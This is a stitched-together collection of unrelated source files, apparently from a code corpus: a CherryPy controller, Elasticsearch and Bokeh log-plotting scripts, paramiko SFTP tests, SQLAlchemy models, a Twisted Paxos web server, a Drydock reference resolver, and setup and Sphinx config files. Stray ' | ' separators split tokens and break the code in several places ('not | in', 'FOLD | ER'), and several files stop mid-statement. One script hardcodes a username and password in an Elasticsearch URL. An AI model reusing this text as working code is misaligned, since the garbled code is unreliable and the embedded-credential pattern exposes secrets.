# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""Module defining the Controller class, described below."""
import cherrypy
from formatters import formats
from model.exceptions import ObjectNotFound
class Controller:
"""Class describing a controller, wrapper for actions.
A controller is a class containing methods that will act as actions. If a
route is connected to an action of a controller (a method of the class),
then it will be called when a request is sent to this route.
"""
server = None
def __init__(self, bundle):
"""Build the controller."""
self.bundle = bundle
@property
def request(self):
"""Return the serving Cherrypy request."""
return cherrypy.serving.request
@property
def requested_format(self):
"""Return the requested format."""
path = self.request.path_info
format = path.split(".")[-1]
if len(format) == len(path):
# The format is not defined
format = ""
return format
@staticmethod
def authenticated(function):
"""Prevent any no-logged-in users to access the action."""
def callable_wrapper(controller, *args, **kwargs):
"""Wrapper of the controller."""
if controller.server.authenticated():
return function(controller, *args, **kwargs)
return "You are not logged in."
return callable_wrapper
def render(self, view, **representations):
"""Render datas using the formatters."""
format = self.requested_format
if not format:
format = self.server.default_format
if format not | in self.server.allowed_formats:
return "Unknown format {}.".format(format)
return formats[format].render(view, **representations)
def get_cookie(self, name, value=None):
"""Return, if found, the cookie.
Otherwise, return value.
"""
return self.server.get_cookie(name, value)
def set_cookie(self, name, value, max_age, path="/", versio | n=1):
"""Set a cookie."""
self.server.set_cookie(name, value, max_age, path, version)
|
canfar/cadcstats | svc_plots/tomcat_old.py | Python | mit | 24,867 | 0.08461 | from elasticsearch import Elasticsearch, TransportError
from elasticsearch.helpers import scan
import requests
import pandas as pd
import numpy as np
import re
from ipaddress import IPv4Address as ipv4, AddressValueError
import time
from bokeh.plotting import figure, output_file, show, save
from bokeh.models import FuncTickFormatter, FixedTicker, NumeralTickFormatter, Div, Title, LinearAxis, Range1d
from bokeh.charts import Bar, Donut
from bokeh.layouts import gridplot, column, row
odin = 'http://odin.cadc.dao.nrc.ca:9200'
my_es = 'http://users:cadcusers@206.12.59.36:9200'
class Init():
def __init__(self, url = my_es, timeout = 120):
self.timeout = timeout
if url:
self.url = url
            if not requests.get(self.url):
                print("Connection incorrect!")
                exit(1)
def connect(self):
return Elasticsearch(self.url, timeout = self.timeout)
def ip2dom(ip):
try:
if ipv4(ip) >= ipv4("132.246.0.0") and ipv4(ip) <= ipv4("132.246.255.255"):
if (ipv4(ip) >= ipv4("132.246.195.0") and ipv4(ip) <= ipv4("132.246.195.24")) or (ipv4(ip) >= ipv4("132.246.217.0") and ipv4(ip) <= ipv4("132.246.217.24")) or (ipv4(ip) >= ipv4("132.246.194.0") and ipv4(ip) <= ipv4("132.246.194.24")):
return "CADC"
else:
return "NRC"
elif ipv4(ip) >= ipv4("206.12.0.0") and ipv4(ip) <= ipv4("206.12.255.255"):
return "CC"
elif ipv4(ip) >= ipv4("192.168.0.0") and ipv4(ip) <= ipv4("192.168.255.255"):
return "CADC"
else:
return "Others"
except AddressValueError:
print("ip address cannot be handled {0}".format(ip))
return "Error"
def timing(func):
def wrapper(*args):
t_i = time.time()
r = func(*args)
t_f = time.time() - t_i
print("{0} took {1:.3f}s".format(func.__name__, t_f))
return r
return wrapper |
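# Usage sketch: decorate any function to print its wall-clock time, e.g.
#
#   @timing
#   def fetch_stats(conn, idx): ...
#
# (hypothetical function, shown for illustration)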
##
# fig1 would not work on my ES index, since I did not do reverse DNS at the time of ingestion,
# nor do I have th | e "clientdomain" field
#
def fig1(conn, idx):
method = ["PUT","GET"]
service = ["transfer_ws", "data_ws", "vospace_ws"]
p = 1
plots = []
for j, s in enumerate(service):
for i, m in enumerate(method):
query = {
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : s } },
{ "term" : { "method" : m } }
]
}
},
"aggs": {
"req_by_dom": {
"terms": {"field": "clientdomain", "size": 6}
}
}
}
try:
res = conn.search(index = idx, body = query)
except TransportError as e:
print(e.info)
raise
df = pd.DataFrame.from_dict(res["aggregations"]["req_by_dom"]["buckets"])
_ = pd.DataFrame([res["aggregations"]["req_by_dom"]["sum_other_doc_count"], "Others"]).T
_.columns = df.columns
df = df.append(_, ignore_index = True)
df.columns = ["Events", "Domains"]
plots.append(Donut(df, label = "Domains", values = "Events", title = "service: {0}, method: {1}".format(s, m)))
    grid = gridplot(plots, ncols = 2, plot_width = 600, plot_height = 600)
output_file("fig1.html")
show(column(Div(text = "<h1>Number of Data Transfers by Domain</h1>", width = 1200), grid))
def fig2(conn, idx):
service = ["transfer_ws", "data_ws", "vospace_ws"]
method = ["get", "put"]
pos = [0, 1, -1]
clr = ["blue", "purple", "green"]
plots = []
for j, s in enumerate(service):
for i, m in enumerate(method):
query = {
"size" : 0,
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : s } },
{ "term" : { "method" : m } }
]
}
},
"aggs" : {
"avgdur_perwk" : {
"date_histogram" : {
"field" : "@timestamp",
"interval" : "month",
"format" : "yyyy-MM-dd"
},
"aggs": {
"avgdur" : {
"avg" : {
"field" : "time"
}
}
}
}
}
}
try:
res = conn.search(index = idx, body = query)
except TransportError as e:
print(e.info)
raise
wk = [_["key_as_string"] for _ in res["aggregations"]["avgdur_perwk"]["buckets"]]
avg_dur = [_["avgdur"]["value"] for _ in res["aggregations"]["avgdur_perwk"]["buckets"]]
df = pd.DataFrame(list(zip(wk, avg_dur)), columns = ["time", "avg_dur"])
df["avg_dur"] = df["avg_dur"] / 1000
plots.append(Bar(df, "time", "avg_dur", legend = False, xlabel = None, yscale = "log", ylabel = "Average Duration", title = "Average Duration per Week (Sec): service: {0}, method: {1}".format(service[j], method[i])))
grid = gridplot(plots, ncols = 1, plot_width = 1200, plot_height = 300)
return column(Div(text = "<h1>Time Evolution of Data Transfers</h1>", width = 1200), grid)
def fig3(conn, idx):
query = {
"size" : 0,
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : "transfer_ws" } },
{ "term" : { "method" : "get"} },
{ "term" : { "from" : "206.12.48.85" } },
{ "range" : { "time" : { "gt" : 0 } } },
{ "range" : { "bytes" : { "gt" : 0 } } },
{ "term" : { "success" : True } }
]
}
},
"aggs" : {
"avgrate_perwk" : {
"date_histogram" : {
"field" : "@timestamp",
"interval" : "month",
"format" : "yyyy-MM-dd"
},
"aggs": {
"avgrate" : {
"avg" : {
"script" : {
"lang" : "painless",
"inline" : "doc['bytes'].value / doc['time'].value"
}
}
}
}
}
}
}
try:
res = conn.search(index = idx, body = query)
except TransportError as e:
print(e.info)
raise
wk = [_["key_as_string"] for _ in res["aggregations"]["avgrate_perwk"]["buckets"]]
avg_rate = [_["avgrate"]["value"] for _ in res["aggregations"]["avgrate_perwk"]["buckets"]]
df = pd.DataFrame(list(zip(wk, avg_rate)), columns = ["time", "avg_rate"]).set_index("time")
query2 = {
"aggs" : {
"numjobs_perwk" : {
"date_histogram" : {
"field" : "@timestamp",
"interval" : "month",
"format" : "yyyy-MM-dd"
}
}
}
}
try:
res = conn.search(index = "logs-condor", body = query2)
except TransportError as e:
print(e.info)
raise
wk2 = [_["key_as_string"] for _ in res["aggregations"]["numjobs_perwk"]["buckets"]]
numjobs = [_["doc_count"] for _ in res["aggregations"]["numjobs_perwk"]["buckets"]]
df2 = pd.DataFrame(list(zip(wk2, numjobs)), columns = ["time", "numjobs"]).set_index("time")
df = df.join(df2)
df = df[pd.notnull(df["numjobs"])].fillna(0)
df["avg_rate"] = df["avg_rate"] / 1000
x = [_ for _ in range(len(df))]
p = figure(plot_width = 1200, toolbar_location = "above")
p.vbar(x = x, top = df["avg_rate"], bottom = 0, width = 0.5, legend = "Avg Rate")
p.y_range = Range1d(0, df["avg_rate"].max() * 1.3)
p.yaxis.axis_label = "Average Transfer Rate (MB/s)"
p.extra_y_ranges = {"right_yaxis": Range1d(0, df["numjobs"].max() * 1.1)}
p.add_layout(LinearAxis(y_range_name = "right_yaxis", axis_label = "Number of Batch Jobs"), "right")
p.line(x = x, y = df["numjobs"], line_width = 2, y_range_name = "right_yaxis", color = "red", legend = "Batch Jobs")
p.legend.location = "top_left"
d = dict(zip(x, df.index))
p.xaxis[0].ticker = FixedTicker(ticks = x)
p.xaxis[0].formatter = FuncTickFormatter(code = """dic = """ + str(d) + """
if (tick in dic) {
return dic[tick]
}
else {
return ''
}""")
p.xaxis.major_label_orientation = np.pi/4
return column(Div(text = "<h1>Average Transfer Rate of <i>batch.canfar.net</i> VS Number of Batch Jobs</h1>", width = 1000), p)
#@timing
def fig4(conn, idx):
iprange = {"132.246.194*":"CADC", "132.246.195*":"CADC", "132.246.217*":"CADC", "132.246*":"NRC+CADC", "192.168*":"CADC-Private", "206.12*":"CC"}
method = ["get", "put"]
i = 0
plots = []
for m in method:
events, gbs = [], []
for _ in iprange:
query = {
"size" : 0,
"query" : {
"bool" : {
"filter" : [
{ "term" : { "service" : "transfer_ws" } },
{ "term" : { "method" : m } },
|
reaperhulk/paramiko | tests/test_sftp_big.py | Python | lgpl-2.1 | 14,044 | 0.001994 | # Copyright (C) 2003-2009 Robey Pointer <robeypointer@gmail.com>
#
# This file is part of paramiko.
#
# Paramiko is free software; you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation; either version 2.1 of the License, or (at your option)
# any later version.
#
# Paramiko is distributed in the hope that it will be useful, but WITHOUT ANY
# WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR
# A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Paramiko; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA.
"""
some unit tests to make sure sftp works well with large files.
a real actual sftp server is contacted, and a new folder is created there to
do test file operations in (so no existing files will be harmed).
"""
import os
import random
import struct
import sys
import time
import unittest
from paramiko.common import o660
from tests.test_sftp import get_sftp
FOLDER = os.environ.get('TEST_FOLDER', 'temp-testing000')
class BigSFTPTest (unittest.TestCase):
def setUp(self):
global FOLDER
sftp = get_sftp()
for i in range(1000):
FOLDER = FOLDER[:-3] + '%03d' % i
try:
sftp.mkdir(FOLDER)
break
except (IOError, OSError):
pass
def tearDown(self):
sftp = get_sftp()
sftp.rmdir(FOLDER)
def test_1_lots_of_files(self):
"""
create a bunch of files over the same session.
"""
sftp = get_sftp()
numfiles = 100
try:
for i in range(numfiles):
with sftp.open('%s/file%d.txt' % (FOLDER, i), 'w', 1) as f:
f.write('this is file #%d.\n' % i)
sftp.chmod('%s/file%d.txt' % (FOLDER, i), o660)
# now make sure every file is there, by creating a list of filenmes
# and reading them in random order.
numlist = list(range(numfiles))
while len(numlist) > 0:
r = numlist[random.randint(0, len(numlist) - 1)]
with sftp.open('%s/file%d.txt' % (FOLDER, r)) as f:
self.assertEqual(f.readline(), 'this is file #%d.\n' % r)
numlist.remove(r)
finally:
for i in range(numfiles):
try:
sftp.remove('%s/file%d.txt' % (FOLDER, i))
except:
pass
def test_2_big_file(self):
"""
write a 1MB file with no buffering.
"""
sftp = get_sftp()
kblob = (1024 * b'x')
start = time.time()
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'w') as f:
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
start = time.time()
with sftp.open('%s/hongry.txt' % FOLDER, 'r') as f:
for n in range(1024):
data = f.read(1024)
self.assertEqual(data, kblob)
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
finally:
sftp.remove('%s/hongry.txt' % FOLDER)
def test_3_big_file_pipelined(self):
"""
write a 1MB file, with no linefeeds, using pipelining.
"""
sftp = get_sftp()
kblob = bytes().join([struct.pack('>H', n) for n in range(512)])
start = time.time()
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'wb') as f:
f.set_pipelined(True)
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
start = time.time()
with sftp.open('%s/hongry.txt' % FOLD | ER, 'rb') as f:
file_size = f.stat().st_size
f.prefetch(file_size)
# read on odd boundaries to make sure the bytes aren't getting scrambled
n = 0
k2blob = kblob + kblob
| chunk = 629
size = 1024 * 1024
while n < size:
if n + chunk > size:
chunk = size - n
data = f.read(chunk)
offset = n % 1024
self.assertEqual(data, k2blob[offset:offset + chunk])
n += chunk
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
finally:
sftp.remove('%s/hongry.txt' % FOLDER)
def test_4_prefetch_seek(self):
sftp = get_sftp()
kblob = bytes().join([struct.pack('>H', n) for n in range(512)])
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'wb') as f:
f.set_pipelined(True)
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
start = time.time()
k2blob = kblob + kblob
chunk = 793
for i in range(10):
with sftp.open('%s/hongry.txt' % FOLDER, 'rb') as f:
file_size = f.stat().st_size
f.prefetch(file_size)
base_offset = (512 * 1024) + 17 * random.randint(1000, 2000)
offsets = [base_offset + j * chunk for j in range(100)]
# randomly seek around and read them out
for j in range(100):
offset = offsets[random.randint(0, len(offsets) - 1)]
offsets.remove(offset)
f.seek(offset)
data = f.read(chunk)
n_offset = offset % 1024
self.assertEqual(data, k2blob[n_offset:n_offset + chunk])
offset += chunk
end = time.time()
sys.stderr.write('%ds ' % round(end - start))
finally:
sftp.remove('%s/hongry.txt' % FOLDER)
def test_5_readv_seek(self):
sftp = get_sftp()
kblob = bytes().join([struct.pack('>H', n) for n in range(512)])
try:
with sftp.open('%s/hongry.txt' % FOLDER, 'wb') as f:
f.set_pipelined(True)
for n in range(1024):
f.write(kblob)
if n % 128 == 0:
sys.stderr.write('.')
sys.stderr.write(' ')
self.assertEqual(sftp.stat('%s/hongry.txt' % FOLDER).st_size, 1024 * 1024)
start = time.time()
k2blob = kblob + kblob
chunk = 793
for i in range(10):
with sftp.open('%s/hongry.txt' % FOLDER, 'rb') as f:
base_offset = (512 * 1024) + 17 * random.randint(1000, 2000)
# make a bunch of offsets and put them in random order
offsets = [base_offset + j * chunk for j in range(100)]
readv_list = []
for j in range(100):
o = offsets[random.randint(0, len(offsets) - 1)]
offsets.remove(o)
readv_list.append((o, chunk))
ret = f.readv(readv_list)
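# Hedged sketch of the verification that typically follows the readv call
# above (assumes readv yields the requested chunks in request order, as
# paramiko's SFTPFile does; this loop is illustrative, not the original code):
# for blob, (offset, length) in zip(ret, readv_list):
#     n_offset = offset % 1024
#     assert blob == k2blob[n_offset:n_offset + length]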
ganesh-95/python-programs | thoughtworks/ascii.py | Python | mit | 197 | 0.015228 |
#sum of ascii values of characters in a string
s = raw_input('enter the string:')  # renamed from `str` to avoid shadowing the built-in
ascii_numbers = [ord(c) for c in s]
print ascii_numbers
print sum(ascii_numbers) | |
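# A hedged, equivalent one-liner in the same Python 2 register as the file
# above; a generator expression avoids building the intermediate list:
# >>> sum(ord(c) for c in 'abc')   # 97 + 98 + 99
# 294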
onlytiancai/warning-collector | src/db.py | Python | mit | 4,385 | 0.001382 | # -*- coding: utf-8 -*-
import sqlalchemy
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from datetime import datetime
from sqlalchemy.exc import DisconnectionError
import web
import config
engine = sqlalchemy.create_engine(config.dbconn, echo=False, connect_args={'charset': 'utf8'}, pool_recycle=5)
Base = declarative_base()
Session = sessionmaker(bind=engine)
# 防止mysql gone away,从池里取连接前先测试连接是否已断开。
def checkout_listener(dbapi_con, con_record, con_proxy):
try:
try:
dbapi_con.ping(False)
except TypeError:
| dbapi_con.ping()
except dbapi_con.OperationalError as exc:
if exc.args[0] in (2006, 2013, 2014, 2045, 2055):
raise DisconnectionError()
else:
raise
sqlalchemy.event.listen(engine, 'checkout', checkout_listener)
class WebSession(Base):
__tablename__ = 'sessions'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
| session_id = sqlalchemy.Column(sqlalchemy.String(128), nullable=False, unique=True, primary_key=True)
atime = sqlalchemy.Column(sqlalchemy.TIMESTAMP, nullable=False, default=sqlalchemy.func.current_timestamp)
data = sqlalchemy.Column(sqlalchemy.TEXT)
class User(Base):
__tablename__ = 'users'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
user_id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
app_id = sqlalchemy.Column(sqlalchemy.String(128))
oauth_user_id = sqlalchemy.Column(sqlalchemy.String(128), index=True)
user_name = sqlalchemy.Column(sqlalchemy.String(128))
extend = sqlalchemy.Column(sqlalchemy.TEXT)
created_on = sqlalchemy.Column(sqlalchemy.DateTime)
def __init__(self, oauth_user_id):
self.oauth_user_id = oauth_user_id
class Warning(Base):
__tablename__ = 'warnings'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
warning_id = sqlalchemy.Column(sqlalchemy.BigInteger, primary_key=True)
user_id = sqlalchemy.Column(sqlalchemy.Integer, index=True)
cate = sqlalchemy.Column(sqlalchemy.String(32))
host = sqlalchemy.Column(sqlalchemy.String(32))
appname = sqlalchemy.Column(sqlalchemy.String(32))
level = sqlalchemy.Column(sqlalchemy.SmallInteger)
title = sqlalchemy.Column(sqlalchemy.String(256))
content = sqlalchemy.Column(sqlalchemy.String(8000))
created_on = sqlalchemy.Column(sqlalchemy.DateTime, index=True)
def __init__(self, user_id, title, content, level=0,
cate="Default", host="Default", appname="Default"):
self.user_id = user_id
self.title = title
self.content = content
self.level = level
self.cate = cate
self.host = host
self.appname = appname
self.created_on = datetime.now()
class WarningCate(Base):
__tablename__ = 'warning_cates'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
cate_id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
user_id = sqlalchemy.Column(sqlalchemy.Integer, index=True)
cate = sqlalchemy.Column(sqlalchemy.String(32))
def __init__(self, user_id, cate):
self.user_id = user_id
self.cate = cate
class LianjianLog(Base):
__tablename__ = 'lianjian_log'
__table_args__ = {'mysql_engine': 'InnoDB', 'mysql_charset': 'utf8'}
__mapper_args__ = {'always_refresh': True}
log_id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
from_user = sqlalchemy.Column(sqlalchemy.String(64), index=True)
op = sqlalchemy.Column(sqlalchemy.SmallInteger)
total_hits = sqlalchemy.Column(sqlalchemy.Integer)
keep_hits = sqlalchemy.Column(sqlalchemy.Integer)
created_on = sqlalchemy.Column(sqlalchemy.DateTime)
def __init__(self, from_user):
self.from_user = from_user
Base.metadata.create_all(engine)
def loadsa():
session = scoped_session(sessionmaker(autoflush=True, bind=engine))
web.ctx.sadbsession = session
web.ctx.db = session()
def unloadsa():
web.ctx.db.close()
web.ctx.sadbsession.remove()
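# Hedged wiring sketch: loadsa/unloadsa are meant to run around each request.
# web.loadhook/web.unloadhook are the standard web.py processor helpers; the
# `app` object below is illustrative only:
# app = web.application(urls, globals())
# app.add_processor(web.loadhook(loadsa))
# app.add_processor(web.unloadhook(unloadsa))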
|
JoseALermaIII/python-tutorials | pythontutorials/Udacity/CS101/Lesson 23 - Problem Set/Q3-Spreading Udaciousness.py | Python | mit | 1,742 | 0.000574 | # Spreading Udaciousness
# One of our modest goals is to teach everyone in the world to program and
# understand computer science. To estimate how long this will take we have
# developed a (very flawed!) model:
# Everyone answering this question will convince a number, spread, (input to
# the model) of their friends to take the course next offering. This will
# continue, so that all of the newly recruited students, as well as the original
# students, will convince spread of their
# friends to take the following offering of the course.
# Assume all newly recruited friends are unique, so there is no duplication among the newly
# recruited students. Define a procedure, hexes_to_udaciousness(n, spread,
# target), that takes three inputs: the starting number of Udacians, the spread
# rate (how many new friends each Udacian convinces to join each hexamester),
# and the target number, and outputs the number of hexamesters needed to reach
# (or exceed) the target.
# For credit, your procedure must not use: while, for, or import math.
def hexes_to_udaciousness(n, spread, target):
if n >= target:
return 0
else:
return 1 + hexes_to_udaciousness((n + (n * spread)), spread, target)
# 0 more needed, since n already exceeds target
print(hexes_to_udaciousness(100000, 2, 36230))
# >>> 0
# after 1 hexamester, there will be 50000 + (50000 * 2) Udacians
print(hexes_to_udaciousness(50000, | 2, 150000))
# >>> 1
# need to match or exceed the target
print(hexes_to_udaciousness(50000, 2, 150001))
# >>> 2
# only 12 hexamesters (2 years) to world domination!
print(hexes_to_udaciousness(20000, 2, 7 * 10 ** 9))
# > | >> 12
# more friends means faster world domination!
print(hexes_to_udaciousness(15000, 3, 7 * 10 ** 9))
# >>> 10
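# Worked trace (illustrative, not part of the original exercise):
# hexes_to_udaciousness(50000, 2, 150001)
# -> 50000 < 150001, recurse with 50000 + 50000 * 2 = 150000   (1 hexamester)
# -> 150000 < 150001, recurse with 150000 + 150000 * 2 = 450000 (2 hexamesters)
# -> 450000 >= 150001, add 0 and unwind: the answer is 2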
|
usi-systems/p4paxos | bmv2/scripts/httpServer.py | Python | apache-2.0 | 2,016 | 0.009425 | #!/usr/bin/env python
import os, json, argparse, ConfigParser
from twisted.internet import reactor, defer
from twist | ed.internet.task import deferLater
from twisted.web.resour | ce import Resource
from twisted.web.server import Site, NOT_DONE_YET
from twisted.web import static
THIS_DIR=os.path.dirname(os.path.realpath(__file__))
from paxoscore.proposer import Proposer
class MainPage(Resource):
def getChild(self, name, request):
if name == '':
return self
else:
print name, request
return Resource.getChild(self, name, request)
def render_GET(self, request):
f = open('%s/web/index.html' % THIS_DIR, 'r')
return f.read()
class WebServer(Resource):
isLeaf = True
def __init__(self, proposer):
Resource.__init__(self)
self.proposer = proposer
def _waitResponse(self, result, request):
result = result.rstrip('\t\r\n\0')
request.write(result)
request.finish()
def render_GET(self, request):
print request
request.args['action'] = 'get'
data = json.dumps(request.args)
d = self.proposer.submit(data)
d.addCallback(self._waitResponse, request)
return NOT_DONE_YET
def render_POST(self, request):
print request
request.args['action'] = 'put'
data = json.dumps(request.args)
d = self.proposer.submit(data)
d.addCallback(self._waitResponse, request)
return NOT_DONE_YET
if __name__=='__main__':
parser = argparse.ArgumentParser(description='Paxos Proposer.')
parser.add_argument('--cfg', required=True)
args = parser.parse_args()
config = ConfigParser.ConfigParser()
config.read(args.cfg)
proposer = Proposer(config, 0)
reactor.listenUDP(config.getint('proposer', 'port'), proposer)
root = MainPage()
server = WebServer(proposer)
root.putChild('jquery.min.js', static.File('%s/web/jquery.min.js' % THIS_DIR))
root.putChild('get', server)
root.putChild('put', server)
factory = Site(root)
reactor.listenTCP(8080, factory)
reactor.run()
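# Hypothetical smoke test against the endpoints registered above (host and
# query parameters are illustrative; the paths and port 8080 match __main__):
# curl "http://localhost:8080/get?key=foo"
# curl -X POST -d "key=foo&value=bar" "http://localhost:8080/put"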
|
att-comdev/drydock | drydock_provisioner/statemgmt/design/resolver.py | Python | apache-2.0 | 4,304 | 0.001394 | # Copyright 2017 AT&T Intellectual Property. All other rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for resolving design references."""
import urllib.parse
import re
import logging
import requests
from drydock_provisioner import error as errors
from drydock_provisioner.util import KeystoneUtils
class ReferenceResolver(object):
"""Class for handling different data references to resolve them data."""
@classmethod
def resolve_reference(cls, design_ref):
"""Resolve a reference to a design document.
Locate a schema handler based on the URI scheme of the data reference
and use that handler to get the data referenced.
:param design_ref: A URI-formatted reference to a data entity
"""
try:
design_uri = urllib.parse.urlparse(design_ref)
handler = cls.scheme_handlers.get(design_uri.scheme, None)
if handler is None:
raise errors.InvalidDesignReference(
"Invalid reference scheme %s: no handler." %
design_uri.scheme)
else:
# Have to do a little magic to call the classmethod as a pointer
return handler.__get__(None, cls)(design_uri)
except ValueError:
raise errors.InvalidDesignReference(
"Cannot resolve design reference %s: unable to parse as valid URI."
% design_ref)
@classmethod
def resolve_reference_http(cls, design_uri):
"""Retrieve design documents from http/https endpoints.
Return a byte array of the response content. Support unsecured or
basic auth
:param design_uri: Tuple as returned by urllib.parse for the design reference
"""
if design_uri.username is not None and design_uri.password is not None:
response = requests.get(
design_uri.geturl(),
auth=(design_uri.username, design_uri.password),
timeout=30)
else:
response = requests.get(design_uri.geturl(), timeout=30)
return response.content
@classmethod
def resolve_reference_file(cls, design_uri):
"""Retrieve design documents from local file endpoints.
Return a byte array of the file contents
:param design_uri: Tuple as returned by urllib.parse for the design reference
"""
if design_uri.path != '':
with open(design_uri.path, 'rb') as f:  # context manager closes the handle
    doc = f.read()
return doc
@classmethod
def resolve_reference_ucp(cls, design_uri):
"""Retrieve artifacts from a UCP service endpoint.
Return a byte array of the response content. Assumes Keystone
authentication required.
:param design_uri: Tuple as returned by urllib.parse for the design reference
"""
ks_sess = KeystoneUtils.get_session()
(new_scheme, foo) = re.subn(r'^[^+]+\+', '', design_uri.scheme)
url = urllib.parse.urlunparse(
(new_scheme, design_uri.netloc, design_uri.path, design_uri.params,
design_uri.query, design_uri.fragment))
logger = logging.getLogger(__name__)
logger.debug("Calling Keystone session for url %s" % str(url))
resp = ks_sess.get(url)
if resp.status_code >= 400:
raise errors.I | nvalidDesignReference(
"Received error code for reference %s: %s - %s" %
(url, str(resp.status_code), resp.text))
return resp.content
scheme_handlers = {
'http': resolve_reference_http,
'file': resolve_reference_file,
'https': resolve_reference_http,
'deckhand+http': resolve_reference_ucp,
'promenade+http': resolve_reference_ucp,
}
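# Minimal usage sketch (hypothetical file path; assumes the referenced design
# document exists locally and so is served by resolve_reference_file):
# doc_bytes = ReferenceResolver.resolve_reference('file:///tmp/design.yaml')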
|
diegoguimaraes/django | tests/reverse_lookup/models.py | Python | bsd-3-clause | 823 | 0 | """
25. Reverse lookups
This demonstrates the reverse lookup features of the database API.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
@python_2_unicode_compatible
class User(models.Model):
name = models.CharField(max_length=200)
def __str__(self):
return self.name
@python_2_unicode_compatible
class Poll(models.Model):
question = models.CharField(max_length=200)
creator = models.ForeignKey(User)
def __str__(self):
return self.question
@python_2_unicode_compatible
class Choice(models.Model):
name = models.CharField(max_length=100)
poll = models.ForeignKey(Poll, related_name="poll_choice")
related_poll = models.ForeignKey(Poll, related_name="related_choice")
def __str__(self):
| retur | n self.name
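# Illustrative reverse lookups these related_name declarations enable
# (object names are hypothetical):
# user.poll_set.all()        # polls created by the user (default reverse name)
# poll.poll_choice.all()     # choices reached through the 'poll' FK
# poll.related_choice.all()  # choices reached through the 'related_poll' FK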
|
mircealungu/Zeeguu-Core | setup.py | Python | mit | 923 | 0.002167 | #!/usr/bin/env python
# -*- coding: utf8 -*-
import setuptools
from setuptools.command.develop import develop
from setuptools.command.install import install
class DevelopScript(develop):
def run(self):
develop.run(self)
nltk_install_packages()
class InstallScript(install):
def run(self):
install.run(self)
nltk_install_packages()
def nltk_install_packages():
import nltk
print("Downloading nltk packages...")
nltk.download('punkt')
nltk.download('averaged_perceptron_tagger')
setuptools.setup(
name="zeeguu_core",
version="0.1",
packages=setuptools.find_packages(),
include_package_d | ata=True,
zip_safe=False,
author="Zeeguu Team",
author_email="me@mir.lu",
description="Core for Zeeguu", |
keywords="second language acquisition api",
cmdclass={
'develop': DevelopScript,
'install': InstallScript,
},
) |
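# Hedged usage note: either install path below should trigger the NLTK
# downloads through the cmdclass hooks above (commands are illustrative):
# pip install .      # runs InstallScript -> nltk_install_packages()
# pip install -e .   # runs DevelopScript -> nltk_install_packages()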
plumdog/datasheet | alembic/versions/13a57b7f084_add_user.py | Python | mit | 741 | 0.013495 | """Add | user
Revision ID: 13a57b7f084
Revises: None
Create Date: 2014-05-11 17:12:17.244013
"""
# revision identifiers, used by Alembic.
revision = '13a57b7f084'
down_revision = None
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('email', sa.String(length=100), nullable=True),
sa.Colu | mn('password_hash', sa.String(length=1000), nullable=True),
sa.PrimaryKeyConstraint('id')
)
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_table('user')
### end Alembic commands ###
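# Typical invocation (illustrative; run from a project root with a configured
# alembic.ini pointing at this versions directory):
# alembic upgrade head     # creates the 'user' table
# alembic downgrade base   # drops it again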
|
leliel12/scikit-criteria | doc/source/conf.py | Python | bsd-3-clause | 6,770 | 0.002068 | # -*- coding: utf-8 -*-
#
# Scikit-Criteria documentation build configuration file, created by
# sphinx-quickstart on Thu Aug 3 02:18:36 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('.'))
sys.path.insert(0, os.path.abspath(os.path.join("..", "..")))
# on_rtd is whether we are on readthedocs.org
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
